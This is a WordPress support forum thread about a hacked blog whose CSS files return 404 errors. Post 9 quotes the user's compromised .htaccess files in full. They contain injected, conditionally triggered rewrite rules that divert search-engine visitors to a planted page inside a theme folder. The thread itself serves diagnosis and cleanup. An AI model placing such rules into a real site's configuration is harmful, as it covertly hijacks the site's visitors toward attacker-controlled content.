WordPress.org

Ready to get started?Download WordPress

Forums

CSS got hacked (11 posts)

  1. dioni
    Member
    Posted 6 years ago #

    One of my blogs got hacked. The CSS is not displaying, including the one for the admin dashboard. The files are all there. I reckon someone hacked the backend code somehow. I tried to clean up everything (delete and reinstall wordpress) twice, changed password, the hacker came back the next day. I tried to update to newest wordpress. I checked the permission on my .htaccess file and it's fine. Anyone has experienced this before?

    Site: http://www.meexia.com/bookie

  2. garbonzo
    Member
    Posted 6 years ago #

    I'm not so sure you got hacked... I should be able to download your css file and look at it, but I can't. Maybe it's missing?

  3. moshu
    Member
    Posted 6 years ago #

    The files all are NOT there - regardless what you think!
    http://www.meexia.com/bookie/wp-content/themes/forever-autumn-10/style.css
    Not found. Take it from there...

  4. dioni
    Member
    Posted 6 years ago #

    Well yea that's the problem. The file is there when I check it with ftp! With the right permission too (644), all folders with the right permission. Basically all my files are intact. But you can't access it.

  5. dioni
    Member
    Posted 6 years ago #

    I meant you can't access them from browsers (like what you tried). I checked that all files have sensible size too (no 0 size).

  6. Samuel Wood (Otto)
    Tech Ninja
    Posted 6 years ago #

    Basically all my files are intact. But you can't access it.

    Well, that's not a hack, that is a server problem. You need to talk to your hosting service.

  7. dioni
    Member
    Posted 6 years ago #

    Well, I just don't get how it worked one day and not the next day. It also works for a few of my wordpress sites and not for a couple of them (which I suspected got hacked) --> all hosted on the same server. Anybody can think of anything else?

    Meanwhile I'll try to talk with my hosting service. But I doubt that this is the problem, because it DOES work with my other wordpress blogs (I have multiple wordpress installations on the server).

    Note that initial installation worked fine. Then it got messed up the next day. Why would my host alter any files or the setting of ONE subfolder? (and without telling me) I have wordpress blogs on other folders and they're all fine. And I'm using godaddy btw, so it should be quite reliable.

  8. Samuel Wood (Otto)
    Tech Ninja
    Posted 6 years ago #

    If the file is there and has correct permissions, but you cannot access it through a web browser, then it's some kind of problem with your server. It's as simple as that. This has nothing to do with WordPress at all. You say the file exists, but the server returns a 404 error for it. That doesn't go through WordPress at all, that's a simple "get a file through a webserver" thing.

    Now, I use GoDaddy too, and they are everything *except* reliable in my experience. But, I have no idea why it doesn't work for your case. I also have no idea why it would work one day and not the next. But I'll lay it out quite clearly:

    The CSS file should exist here:
    http://www.meexia.com/bookie/wp-content/themes/forever-autumn-10/style.css

    But it does not. That's the problem. It's a simple as that. Figure out why that link doesn't pull up the CSS file, and the problem will be fixed.

    BTW, what is the content of your .htaccess file in the bookie directory? Same goes for the main web root directory, what's the .htaccess there? Perhaps you have something there that you should not have.

  9. dioni
    Member
    Posted 6 years ago #

    This is the content of my .htaccess in main directory:
    # a0b4df006e02184c60dbf503e71c87ad
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC]
    RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=
    RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22)
    RewriteCond %{TIME_SEC} <59
    RewriteRule ^.*$ /blog/wp-content/themes/squares/orelura/ex3/t.htm [L]
    # a995d2cc661fa72452472e9554b5520c

    This is the content of my .htaccess in bookie directory:

    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /bookie/
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    # a0b4df006e02184c60dbf503e71c87ad
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC]
    RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=
    RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22)
    RewriteCond %{TIME_SEC} <59
    RewriteRule ^.*$ /blog/wp-content/themes/squares/orelura/ex3/t.htm [L]
    # a995d2cc661fa72452472e9554b5520c

    RewriteRule . /bookie/index.php [L]
    </IfModule>

    # END WordPress

  10. dioni
    Member
    Posted 6 years ago #

    Okay I just saw that this line looks very suspicious:
    RewriteRule ^.*$ /blog/wp-content/themes/squares/orelura/ex3/t.htm [L]

    Many months ago I got a few emails from various people saying that my server has been compromised and that it hosted some files attacking other people's servers. I've deleted the folder and looks like it contains new files now (they're different than the last ones). So I just deleted that folder again, and then delete the .htaccess file on /blog/ directory (cos the content looked suspicious too). I wonder if that's enough. I think it's possible that there was some harmful file inside a wordpress theme that I put in.

  11. syncbox
    Member
    Posted 6 years ago #

    nevermind... I edited my comment. Godaddy, btw, STILL doesn't offer the latest version of WordPress... and I was the one that got them to go from 2.1.2 to 2.3.2 (trying to get them to stay up-to-date)...

    anyway, good luck with your issues... I got hacked once and I've been much more diligent about keeping WordPress up-to-date since.

Topic Closed

This topic has been closed to new replies.

About this Topic